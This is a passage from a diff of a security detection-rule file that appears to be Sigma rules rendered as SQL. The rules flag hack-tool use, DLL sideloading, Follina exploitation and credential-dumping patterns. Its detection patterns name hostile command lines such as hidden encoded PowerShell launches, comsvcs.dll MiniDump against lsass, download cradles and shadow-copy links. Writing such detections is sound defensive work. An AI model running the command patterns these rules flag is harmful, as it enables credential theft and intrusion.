"attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR 